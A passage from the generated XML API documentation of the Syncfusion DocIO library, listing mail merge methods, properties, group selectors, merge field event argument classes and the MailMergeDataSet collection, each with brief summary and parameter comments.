        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateEnum(System.String,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Updates the enum.
            </summary>
            <param name="tableName">Name of the table.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetDataTable(System.String)">
            <summary>
            Gets the data table.
            </summary>
            <param name="tableName">Name of the table.</param>
            <param name="commands">The commands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetDataTable(System.String,Syncfusion.DocIO.DLS.MailMergeDataSet)">
            <summary>
            Gets the data table.
            </summary>
            <param name="tableName">Name of the table.</param>
            <param name="commands">The commands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetCommand(System.String)">
            <summary>
            Gets the command.
            </summary>
            <param name="tableName">Name of the table.</param>
            <param name="commands">The commands.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateVarCmd(System.String)">
            <summary>
            Updates the variable part of the command.
            </summary>
            <param name="command">The command.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.VerifyNestedGroups(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Checks the table nested groups.
            </summary>
            <param name="startRow">The start row.</param>
            <param name="endRow">The end row.</param>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.FindNestedGroup(System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Finds the table groups.
            </summary>
            <param name="startRow">The start row.</param>
            <param name="endRow">The end row.</param>
            <param name="table">The table.</param>
            <returns>The founded nested group name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetDataTableConn(System.String)">
            <summary>
            Gets the data table using connent.
            </summary>
            <param name="tableName">Name of the table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetDataTableDSet(System.String)">
            <summary>
            Gets the data table using data set.
            </summary>
            <param name="tableName">Name of the table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.SendMergeField(Syncfusion.DocIO.DLS.IWMergeField,System.Object,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Sends MergeField event.
            <exclude/>
            </summary>
            <param name="field">The field.</param>
            <param name="value">The value.</param>
            <param name="rowsEnum">The rows enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.SendMergeImageField(Syncfusion.DocIO.DLS.IWMergeField,System.Object,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            
            </summary>
            <param name="rowsEnum"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.CheckNextRow(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Check the next matching record
            </summary>
            <param name="rowsEnum">Rows enumerator</param>
            <returns>A boolean value indicating the next matching record</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForSection(Syncfusion.DocIO.DLS.IWSection,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            
            </summary>
            <param name="sec"></param>
            <param name="rowsEnum"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForTextBody(Syncfusion.DocIO.DLS.BodyItemCollection,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes for text body.
            </summary>
            <param name="bodyItems">The body items.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForTextBodyItem(Syncfusion.DocIO.DLS.ITextBodyItem,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes for text body item.
            </summary>
            <param name="bodyItems">The body items.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForParagraph(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes for paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForParagraphItems(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.IRowsEnumerator,System.Boolean@)">
            <summary>
            Executes for paragraph items.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="rowsEnum">The rows enum.</param>
            <param name="pItem">The Paragraph item.</param>
            <param name="paraItemCollectionChanged">The indicate whether the paragraph item collection changed or not.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteForTable(Syncfusion.DocIO.DLS.IWTable,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes for table.
            </summary>
            <param name="table">The table.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ConvertToText(Syncfusion.DocIO.DLS.WField,System.String)">
            <summary>
            Converts to text.
            </summary>
            <param name="field">The field.</param>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateMergedRecordCount">
            <summary>
            Updates the merged record count.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateMergeFieldValue(Syncfusion.DocIO.DLS.WMergeField,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Updates the field value.
            </summary>
            <param name="mergeField">The field.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateMergeFieldResult(Syncfusion.DocIO.DLS.WMergeField,System.Object,Syncfusion.DocIO.DLS.IRowsEnumerator,System.Int32)">
            <summary>
            Updates the merge field result as text range.
            </summary>
            <param name="mergeField">The merge field.</param>
            <param name="value">The value.</param>
            <param name="rowsEnum">The rows enum.</param>
            <param name="valIndex">Index of the value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveField(Syncfusion.DocIO.DLS.WField,System.Boolean)">
            <summary>
            Removes the field from its owner paragraph
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.InsertMergeFieldResultAsTextRange(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            Insert text range in the place of merge field with result value
            </summary>
            <param name="mergeField">The merge field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetFieldValue(Syncfusion.DocIO.DLS.IWMergeField,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Gets the field value.
            </summary>
            <param name="field">The field.</param>
            <param name="rowsEnum">The rows enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetFieldValue(System.String,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Gets the field value.
            </summary>
            <param name="fieldName">Name of the field.</param>
            <param name="rowsEnum">The rows enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateIfFieldValue(Syncfusion.DocIO.DLS.WIfField,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Updates if field value.
            </summary>
            <param name="field">The field.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateImageMergeFieldValue(Syncfusion.DocIO.DLS.WMergeField,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            
            </summary>
            <param name="mergeField"></param>
            <param name="paragraph"></param>
            <param name="rowsEnum"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateMergedPicture(Syncfusion.DocIO.DLS.WMergeField,Syncfusion.DocIO.DLS.MergeImageFieldEventArgs)">
            <summary>
            Updates the merged picture.
            </summary>
            <param name="mergeField">The field.</param>
            <param name="paragraph">The paragraph.</param>
            <param name="args">The <see cref="T:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs"/> instance containing the event data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.UpdateMergeFieldValue(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            
            </summary>
            <param name="mergeField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.CopyContent(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Copies all document sections to clipboard. 
            </summary>
            <param name="document"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.AppendCopiedContent(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Appends copied sections to end of document. 
            </summary>
            <param name="document"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetBitmap(System.Object)">
            <summary>
            Gets the bitmap.
            </summary>
            <param name="data">The data.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetFieldNamesForParagraph(System.Collections.Generic.List{System.String},Syncfusion.DocIO.DLS.TextBodyItem,System.String)">
            <summary>
            Gets the field names for paragraph.
            </summary>
            <param name="fieldsArray">The fields array.</param>
            <param name="paragraph">The paragraph.</param>
            <param name="groupName">Name of the group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetFieldNamesForParagraphItems(System.Collections.Generic.List{System.String},Syncfusion.DocIO.DLS.ParagraphItem,System.String)">
             <summary>
             Gets the field names from paragraph item.
             </summary>
            <param name="fieldsArray">The fields array.</param>
             <param name="pStructureDocumentTagBlocklockContent">Paragraph item</param>
             <param name="groupName">Name of the group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetFiledNamesForSDTBlockItems(System.Collections.Generic.List{System.String},Syncfusion.DocIO.DLS.StructureDocumentTagBlock,System.String)">
             <summary>
             Iterate StructureDocumentTagBlock items to get the fields name. 
             </summary>
            <param name="pFieldsArray">The fields array.</param>
             <param name="structureDocumentTagBlocklockContent">StructureDocumentTagBlocklockContent</param>
             <param name="groupName">Name of the group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.IsBeginGroup(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            Determines whether [is start prefix] [the specified field].
            </summary>
            <param name="field">The field.</param>
            <returns>
            	<c>true</c> if it specifies a begining of the group field, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.IsEndGroup(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            Determines whether [is end group] [the specified field].
            </summary>
            <param name="field">The field.</param>
            <returns>
            	If it is a end of the group, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.CheckSelection(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Checks the selection.
            </summary>
            <param name="rowsEnum">The rows enum.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.HideFields(Syncfusion.DocIO.DLS.IWSectionCollection)">
            <summary>
            Hides the fields.
            </summary>
            <param name="sections">The sections.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyMergeFieldsInTableRow(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Hides the fields.
            </summary>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyMergeFieldsInBodyItems(Syncfusion.DocIO.DLS.TextBodySelection)">
            <summary>
            Removes the empty merge fields in body items.
            </summary>
            <param name="selection">The selection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyMergeFieldsInBodyItems(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Hides the fields.
            </summary>
            <param name="items">The body items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyMergeFieldsInParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Hides the fields.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.HideField(Syncfusion.DocIO.DLS.WField,System.Boolean)">
            <summary>
            Hides the field.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetMappedColName(System.String)">
            <summary>
            Gets the  name of the mapped column name.
            </summary>
            <param name="fieldName">Name of the merge field.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveSpellChecking">
            <summary>
            Removes the spell checking.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.ClearFields">
            <summary>
            Gets or sets a value indicating whether to remove empty mail merge fields from a document. The default is <b>true</b>.
            </summary>
            <value>Set <c>true</c> to remove empty mail merge fields from a document; otherwise, false.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.Document">
            <summary>
            Gets the document.
            <exclude/>
            </summary>
            <value>The document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyParagraphs">
            <summary>
            Gets or sets a value indicating whether to remove paragraphs which contain empty merge fields.
            </summary>
            <value>
            Set to <b>True</b> to remove empty paragraphs; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.RemoveEmptyGroup">
            <summary>
            Gets or sets a value indicating whether to remove groups which contain empty merge fields.
            </summary>
            <value>
            Set to <b>True</b> to remove empty groups; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.NestedEnums">
            <summary>
            Gets the enumerators which are used during mailmerge.
            </summary>
            <value>The nested enums.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.CurrentDataSet">
            <summary>
            Gets the current data set for nested mail merge.
            </summary>
            <value>The current data set.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.VariableCommandRegex">
            <summary>
            Gets the variable command regulat expression.
            </summary>
            <value>The variable command regex.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelectors">
            <summary>
            Gets the group selectors.
            </summary>
            <value>The group selectors.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.MappedFields">
            <summary>
            Gets the collection of mapped fields.
            </summary>
            <value>The mapped fields represent mapping between
            fields names in the data source and mail merge fields in the document. The keys of
            the collection are merge field names and the values are field names in the data source.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.CurrentDataSetDocIO">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.ClearFieldsState">
            <summary>
            Gets the previous state of the clear fields.
            </summary>
            <value>The previous state of the clear fields.</value>
        </member>
        <member name="E:Syncfusion.DocIO.DLS.MailMerge.MergeField">
            <summary>
            Occurs during mail merge when a text merge field is encountered in the document.
            </summary>
        </member>
        <member name="E:Syncfusion.DocIO.DLS.MailMerge.MergeImageField">
            <summary>
            Occurs during mail merge when an image merge field is encountered in the document.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMerge.GroupSelector">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.m_groupSelection">
            <summary>
            The internal fields.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.#ctor(Syncfusion.DocIO.DLS.MailMerge.GroupSelector.GroupFound)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMerge.GroupSelector"/> class.
            </summary>
            <param name="onGroupFound">The on group found.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.InitProcess(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Initialize the process.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.ProcessGroups(Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Processes the groups.
            </summary>
            <param name="body">The body.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.ProcessGroups(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Processes the groups.
            </summary>
            <param name="table">The table.</param>
            <param name="startRow">The start row.</param>
            <param name="endRow">The end row.</param>
            <param name="rowsEnum">The rows enumerator.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.FindInBodyItems(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Finds inside body items.
            </summary>
            <param name="bodyItems">The body items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.FindInTable(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32)">
            <summary>
            Finds the group in the table.
            </summary>
            <param name="table">The table.</param>
            <param name="startRow">The start row.</param>
            <param name="endRow">The end row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.ClearSelection">
            <summary>
            Clears the selection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.CheckItem(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Checks the item.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.StartSelection(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            Starts the selection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.EndSelection(Syncfusion.DocIO.DLS.WMergeField)">
            <summary>
            Ends the selection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.UpdateEndSelection(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Updates end of row selection in case cell has vertical merge.
            </summary>
            <param name="cell">The cell.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.GroupSelection">
            <summary>
            Gets the group selection.
            </summary>
            <value>The group selection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.RowSelection">
            <summary>
            Gets the row selection.
            </summary>
            <value>The row selection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.BeginGroupField">
            <summary>
            Gets the begin group field.
            </summary>
            <value>The begin group field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.EndGroupField">
            <summary>
            Gets or sets the end group field.
            </summary>
            <value>The end group field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.BodyItemIndex">
            <summary>
            Gets or sets the index of the body item.
            </summary>
            <value>The index of the body item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.IsGroupFound">
            <summary>
            Gets a value indicating whether group is found.
            </summary>
            <value>
            	If group is found, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.GroupName">
            <summary>
            Gets the name of the group.
            </summary>
            <value>The name of the group.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.SelectedBodyItemsCount">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMerge.GroupSelector.GroupFound">
            <summary>
            
            </summary>
            <param name="rowsEnum"></param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMerge.TableRowSelection">
            <summary>
            Represents a row selection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.TableRowSelection.#ctor(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMerge.TableRowSelection"/> class.
            </summary>
            <param name="table">The table.</param>
            <param name="startRowIndex">Start index of the row.</param>
            <param name="endRowIndex">End index of the row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.TableRowSelection.ValidateIndexes">
            <summary>
            Validates the indexes.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MergeFieldEventHandler">
            <summary>
            Represents the method that handles MergeField event
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MergeImageFieldEventHandler">
            <summary>
            Represents the method that handles MergeImageField event
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MergeFieldEventArgs">
            <summary>
            Represents the MergeField event that occurs during mail merge operation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeFieldEventArgs.m_doc">
            <summary>
            Represents the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeFieldEventArgs.m_field">
            <summary>
            Represents the Merge field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeFieldEventArgs.m_fieldValue">
            <summary>
            Represents the Field Value
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeFieldEventArgs.m_rowIndex">
            <summary>
            Represents the Row Index.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeFieldEventArgs.m_tableName">
            <summary>
            Represents the Table Name
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MergeFieldEventArgs.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String,System.Int32,Syncfusion.DocIO.DLS.IWMergeField,System.Object)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.MergeFieldEventArgs"/> class for the specified document
            with table name, row index, field and its value.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
            <param name="tableName">The name of the table to perform merge.</param>
            <param name="rowIndex">The row index in the table.</param>
            <param name="field">The <see cref="T:Syncfusion.DocIO.DLS.IWMergeField"/> instance.</param>
            <param name="value">An <see cref="T:System.Object"/> that specifies field value.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.Document">
            <summary>
            Gets the document instance. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.FieldName">
            <summary>
            Gets the merge field Name. Read-only.
            </summary>
            <value>The <b>string </b> that specifies the merge field name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.FieldValue">
            <summary>
            Gets the merge field value. Read-only.
            </summary>
            <value>An <see cref="T:System.Object"/> that specifies the field value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.TableName">
            <summary>
            Gets the table name. Read-only.
            </summary>
            <value>The <b>string </b> that specifies the table name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.RowIndex">
            <summary>
            Gets the row index. Read-only.
            </summary>
            <value>The <b>integer </b>that specifies the row index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.CharacterFormat">
            <summary>
            Gets the character format of the field. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> instance that specifies the character format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.Text">
            <summary>
            Gets or sets the field value.
            </summary>
            <value>The <b>string </b> that specifies the field value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeFieldEventArgs.CurrentMergeField">
            <summary>
            Gets the current merge field. Read-only.
            </summary>
            <value>The current <see cref="T:Syncfusion.DocIO.DLS.IWMergeField"/> instance.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs">
            <summary>
            Represents the MergeImageField event that occurs during Mail merge.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.m_useText">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.m_image">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.m_imageFileName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.m_imageStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.m_bSkip">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String,System.Int32,Syncfusion.DocIO.DLS.IWMergeField,System.Drawing.Image)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs"/> class for the specified Word document with
            table name, row index, field instance and the image.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
            <param name="tableName">The name of the table to perform merge.</param>
            <param name="rowIndex">The row index in the table.</param>
            <param name="field">The <see cref="T:Syncfusion.DocIO.DLS.IWMergeField"/> instance.</param>
            <param name="image">The <see cref="T:System.Drawing.Image"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String,System.Int32,Syncfusion.DocIO.DLS.IWMergeField,System.Object)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs"/> class for the specified Word document with
            table name, row index, field instance and the image.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
            <param name="tableName">The name of the table to perform merge.</param>
            <param name="rowIndex">The row index in the table.</param>
            <param name="field">The <see cref="T:Syncfusion.DocIO.DLS.IWMergeField"/> instance.</param>
            <param name="obj">An <see cref="T:System.Object"/> that specifies image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.LoadImage(System.String)">
            <summary>
            
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.LoadImage(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.UseText">
            <summary>
            Gets a value indicating whether to use text. Read-only.
            </summary>
            <value><b>True</b> if to use the text; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.ImageFileName">
            <summary>
            Gets or sets the image file name.
            </summary>
            <value>The <b>string</b> that specifies the image file name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.ImageStream">
            <summary>
            Gets or sets the image stream.
            </summary>
            <value>The <see cref="T:System.IO.Stream"/> that represents the image stream.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.Image">
            <summary>
            Gets or sets the image.
            </summary>
            <value><see cref="T:System.Drawing.Image"/> that specifies the image.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs.Skip">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.MergeImageFieldEventArgs"/> is skip.
            </summary>
            <value><b>True</b> if skip; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityEntry">
            <summary>
            Represents the entries of entity class.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityEntry.Current">
            <summary>
            Specifies the current entity.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityEntry.Index">
            <summary>
            Specifies the index value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityEntry.#ctor(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of <see cref="T:Syncfusion.DocIO.DLS.EntityEntry"/> class with the specified entity.
            </summary>
            <param name="ent">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityEntry.Fetch">
            <summary>
            Fetches the entries element.
            </summary>
            <returns><b>True </b>if contains entry; otherwise, <b>false</b>.</returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMergeDataSet">
            <summary>
            Represents the data sets to perform mail merge operation.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataSet.#ctor">
            <summary>
            Create new instance of <see cref="T:Syncfusion.DocIO.DLS.MailMergeDataSet"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataSet.Add(System.Object)">
            <summary>
            Appends a new mail merge data set object to collection.
            </summary>
            <param name="dataTable">MailMergeDataTable</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataSet.Clear">
            <summary>
            Removes all the mail merge dataset objects from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMergeDataSet.GetDataTable(System.String)">
            <summary>
            Gets MailMergeDataTable with necessary table name
            </summary>
